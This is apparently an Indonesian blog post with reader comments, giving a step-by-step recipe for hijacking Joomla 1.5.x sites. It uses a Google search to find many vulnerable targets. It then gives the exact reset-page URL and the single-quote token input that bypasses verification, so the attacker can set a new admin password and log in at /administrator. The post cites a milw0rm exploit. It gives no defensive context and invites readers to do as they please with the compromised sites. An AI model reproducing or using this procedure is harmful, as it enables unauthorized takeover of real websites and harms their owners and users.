Joomla 1.5.x Remote Admin Password Change

1. Seperti biasa buka uncle google masukin keyword inurl:/com_user/models/
wow targetna banyak euy….
2. Tambahkan di url web target menjadi
www.webtarget.com/index.php?option=com_user&view=reset&layout=confirm
3. Masukin token char ‘ klik OK
4. Buat password baru
5. Ganti URL web target jadi www.webtarget.com/administrator
6. Login user admin password sesuai dengan pass yang tadi kamu buat
7. Terserah dirimu lah….
8. Kopi habis tidur dulu ah….

referensi : http://milw0rm.org/exploits/6234

4 Tanggapan ke “Joomla 1.5.x Remote Admin Password Change”

  1. gantengs Berkata:

    masukin token char ‘ mxdnya apa sih??

  2. iwan Berkata:

    maksudnya masukin token char ‘ untuk membypass password admin jadi kita bisa masukin password baru gitu bro
    coba baca aja biar lebih jelas di http://milw0rm.org/exploits/6234

  3. menofwar Berkata:

    kok g bs knp,.??

  4. iwan Berkata:

    udah di patch kali bug nya

Tinggalkan Balasan